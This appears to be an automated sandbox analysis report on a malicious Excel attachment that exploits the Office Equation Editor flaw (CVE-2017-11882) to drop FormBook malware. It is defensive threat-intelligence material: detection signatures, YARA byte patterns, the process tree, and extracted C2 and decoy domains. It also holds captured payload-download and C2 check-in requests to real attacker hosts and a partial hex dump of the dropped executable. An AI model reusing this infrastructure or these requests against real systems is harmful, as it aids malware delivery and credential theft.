
Windows Analysis Report RFQ HCI20220113.xlsx

Overview

General Information

Sample Name: RFQ HCI20220113.xlsx
Analysis ID: 552850
MD5: da4befa8dfe9d56b937b01a2d2818175
SHA1: cf8e6ae0b8afb3d3f2956fbe0c88599fb361ede8
SHA256: 87f4b613c197b92f31d5eed4c7ad32a8ba4ae68313d56b54ff656f273fb56d86
Tags: VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2032 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2016 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2540 cmdline: "C:\Users\Public\vbc.exe" MD5: 83AC585E99B527EEB278702F8F711568)
      • vbc.exe (PID: 2712 cmdline: C:\Users\Public\vbc.exe MD5: 83AC585E99B527EEB278702F8F711568)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • cmd.exe (PID: 2568 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.topeasyip.company/i5nb/"], "decoy": ["integratedheartspsychology.com", "tappsis.land", "norfg.com", "1531700.win", "oneplusoneexperience.com", "circlessalaries.com", "tlcremodelingcompany.com", "susalud.info", "liyanghua.club", "pink-zemi.com", "orphe.biz", "themodelclarified.com", "candidate.tools", "morotrip.com", "d2dfms.com", "leisuresabah.com", "bjbwx114.com", "lz-fcaini1718-hw0917-bs.xyz", "at-commerce-co.net", "buymypolicy.net", "5151vip73.com", "rentglide.com", "louiecruzbeltran.info", "lanabasargina.com", "lakeforestparkapartments.com", "guangkaiyinwu.com", "bornthin.com", "restaurantkitchenbuilders.com", "ecommerceoptimise.com", "datahk99.com", "markfwalker.com", "granitowawarszawa.com", "theyouthwave.com", "iabg.xyz", "jholbrook.com", "bsc.promo", "xn--grlitzerseebhne-8sb7i.com", "cafeteriasula.com", "plushcrispies.com", "dedicatedvirtualassistance.com", "ventura-taxi.com", "thoethertb434-ocn.xyz", "ylhwcl.com", "bigsyncmusic.biz", "terapiaholisticaemformacao.com", "comidies.com", "171diproad.com", "07dgj.xyz", "vppaintllc.com", "thepatriottutor.com", "wxfive.com", "ceinpsico.com", "tuningelement.store", "asinment.com", "diafraz.xyz", "8crhnwh658ga.biz", "redwolf-tech.com", "ksherfan.com", "sensationalshroom.com", "buy-instagram-followers.net", "treeserviceconsulting.com", "vnln.space", "kate-films.com", "selfmeta.club"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
  • 0x16b18:$sqlite3text: 68 38 2A 90 C5
  • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
(31 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
5.0.vbc.exe.400000.9.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.0.vbc.exe.400000.9.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.vbc.exe.400000.9.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
  • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
  • 0x15d18:$sqlite3text: 68 38 2A 90 C5
  • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
  • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
5.2.vbc.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.vbc.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(24 further entries not shown)

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 198.23.213.59, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2016, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2016, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2016, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2540
Sigma detected: Execution from Suspicious Folder
Source: Process started; Author: Florian Roth; Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2016, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2540

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp; Malware Configuration Extractor: FormBook {"C2 list": ["www.topeasyip.company/i5nb/"], "decoy": ["integratedheartspsychology.com", "tappsis.land", "norfg.com", "1531700.win", "oneplusoneexperience.com", "circlessalaries.com", "tlcremodelingcompany.com", "susalud.info", "liyanghua.club", "pink-zemi.com", "orphe.biz", "themodelclarified.com", "candidate.tools", "morotrip.com", "d2dfms.com", "leisuresabah.com", "bjbwx114.com", "lz-fcaini1718-hw0917-bs.xyz", "at-commerce-co.net", "buymypolicy.net", "5151vip73.com", "rentglide.com", "louiecruzbeltran.info", "lanabasargina.com", "lakeforestparkapartments.com", "guangkaiyinwu.com", "bornthin.com", "restaurantkitchenbuilders.com", "ecommerceoptimise.com", "datahk99.com", "markfwalker.com", "granitowawarszawa.com", "theyouthwave.com", "iabg.xyz", "jholbrook.com", "bsc.promo", "xn--grlitzerseebhne-8sb7i.com", "cafeteriasula.com", "plushcrispies.com", "dedicatedvirtualassistance.com", "ventura-taxi.com", "thoethertb434-ocn.xyz", "ylhwcl.com", "bigsyncmusic.biz", "terapiaholisticaemformacao.com", "comidies.com", "171diproad.com", "07dgj.xyz", "vppaintllc.com", "thepatriottutor.com", "wxfive.com", "ceinpsico.com", "tuningelement.store", "asinment.com", "diafraz.xyz", "8crhnwh658ga.biz", "redwolf-tech.com", "ksherfan.com", "sensationalshroom.com", "buy-instagram-followers.net", "treeserviceconsulting.com", "vnln.space", "kate-films.com", "selfmeta.club"]}
Multi AV Scanner detection for submitted file
Source: RFQ HCI20220113.xlsx; Virustotal: Detection: 33%
Source: RFQ HCI20220113.xlsx; ReversingLabs: Detection: 30%
Yara detected FormBook
Source: Yara match; File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://198.23.213.59/1155/vbc.exe; Avira URL Cloud: Label: malware
Source: www.topeasyip.company/i5nb/; Avira URL Cloud: Label: malware
Source: http://www.ylhwcl.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA==; Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\Public\vbc.exe; Avira: detection malicious, Label: HEUR/AGEN.1211287
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe; Avira: detection malicious, Label: HEUR/AGEN.1211287
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe; ReversingLabs: Detection: 43%
Source: C:\Users\Public\vbc.exe; ReversingLabs: Detection: 43%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe; Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.vbc.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.5.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.9.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.7.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: cmd.pdb,$ source: vbc.exe, 00000005.00000003.519388650.000000000054A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.519365652.000000000050C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.520545491.0000000000470000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000002.520863272.0000000000A50000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.483549508.0000000000740000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.482084370.00000000005E0000.00000004.00000001.sdmp, cmd.exe
Source: Binary string: cmd.pdb source: vbc.exe, 00000005.00000003.519388650.000000000054A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.519365652.000000000050C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.520545491.0000000000470000.00000040.00020000.sdmp
Source: global traffic; DNS query: name: www.orphe.biz
Source: C:\Users\Public\vbc.exe; Code function: 4x nop then pop esi
Source: C:\Users\Public\vbc.exe; Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 4x nop then pop esi
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 198.23.213.59:80
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 198.23.213.59:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 103.224.212.220:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 103.224.212.220:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 103.224.212.220:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 122.10.28.11:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 122.10.28.11:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 122.10.28.11:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 192.185.98.251:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 192.185.98.251:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 192.185.98.251:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Domain query: www.terapiaholisticaemformacao.com
Source: C:\Windows\explorer.exe; Network Connect: 103.224.212.220 80
Source: C:\Windows\explorer.exe; Network Connect: 195.211.74.112 80
Source: C:\Windows\explorer.exe; Domain query: www.ylhwcl.com
Source: C:\Windows\explorer.exe; Domain query: www.integratedheartspsychology.com
Source: C:\Windows\explorer.exe; Domain query: www.circlessalaries.com
Source: C:\Windows\explorer.exe; Network Connect: 221.121.143.148 80
Source: C:\Windows\explorer.exe; Domain query: www.topeasyip.company
Source: C:\Windows\explorer.exe; Network Connect: 216.172.160.188 80
Source: C:\Windows\explorer.exe; Network Connect: 23.80.120.93 80
Source: C:\Windows\explorer.exe; Domain query: www.ecommerceoptimise.com
Source: C:\Windows\explorer.exe; Network Connect: 122.10.28.11 80
Source: C:\Windows\explorer.exe; Domain query: www.bjbwx114.com
Source: C:\Windows\explorer.exe; Network Connect: 192.185.98.251 80
Source: C:\Windows\explorer.exe; Domain query: www.orphe.biz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.topeasyip.company/i5nb/
Source: Joe Sandbox View; ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU
Source: Joe Sandbox View; ASN Name: AS45671-NET-AUWholesaleServicesProviderAU
Source: global traffic; HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew== HTTP/1.1; Host: www.orphe.biz; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr HTTP/1.1; Host: www.circlessalaries.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA== HTTP/1.1; Host: www.ylhwcl.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /i5nb/?7nqdxT7p=mP9GS3thMR3+ARMxpcHmObplP0vLxCSJ1Uc4SKl6p1x9FFB9D/wfcJtU5Ejvu094ffKQCA==&hPGx3Z=4ha06H5pmr HTTP/1.1; Host: www.terapiaholisticaemformacao.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw== HTTP/1.1; Host: www.ecommerceoptimise.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr HTTP/1.1; Host: www.integratedheartspsychology.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw== HTTP/1.1; Host: www.bjbwx114.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View; IP Address: 103.224.212.220
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 02:21:54 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.26Last-Modified: Thu, 13 Jan 2022 22:04:27 GMTETag: "66000-5d57ddeb75e04"Accept-Ranges: bytesContent-Length: 417792Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 48 3f e0 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 56 06 00 00 08 00 00 00 00 00 00 3a 75 06 00 00 20 00 00 00 80 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 06 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 74 06 00 57 00 00 00 00 80 06 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 55 06 00 00 20 00 00 00 56 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 80 06 00 00 06 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 06 00 00 02 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 75 06 00 00 00 00 00 48 00 00 00 02 00 05 00 7c 46 06 00 64 2e 00 00 03 00 00 00 2d 
00 00 06 f8 5d 00 00 84 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 02 28 17 00 00 0a 02 03 7d 01 00 00 04 02 28 18 00 00 0a 6f 19 00 00 0a 7d 03 00 00 04 2a 00 1b 30 02 00 1b 00 00 00 01 00 00 11 02 7b 01 00 00 04 0a 06 1f fd 2e 04 06 17 33 0a 00 de 07 02 28 04 00 00 06 dc 2a 00 01 10 00 00 02 00 11 00 02 13 00 07 00 00 00 00 1b 30 04 00 fc 00 00 00 02 00 00 11 02 7b 01 00 00 04 0b 07 2c 0b 07 17 2e 66 16 0a dd e5 00 00 00 02 15 7d 01 00 00 04 02 16 7d 06 00 00 04 02 17 7d 07 00 00 04 02 1f fe 73 0a 00 00 06 6f 04 00 00 0a 7d 08 00 00 04 02 1f fd 7d 01 00 00 04 38 7f 00 00 00 02 02 7b 08 00 00 04 6f 03 00 00 0a 7d 09 00 00 04 02 02 7b 07 00 00 04 7d 02 00 00 04 02 17 7d 01 00 00 04 17 0a dd 86 00 00 00 02 1f fd 7d 01 00 00 04 02 7b 04 00 00 04 0d 02 09 17 59 7d 04 00 00 04 02 7b 04 00 00 04 2d 04 16 0a 2b 48 02 7b 07 00 00 04 0c 02 08 02 7b 06 00 00 04 58 02 7b 04 00 00 04 58 20 8d 3b e0 7c 02 7b 09 00 00 04 58 61 7d 07 00 00 04 02 08 7
            Source: global trafficHTTP traffic detected: GET /1155/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.213.59Connection: Keep-Alive
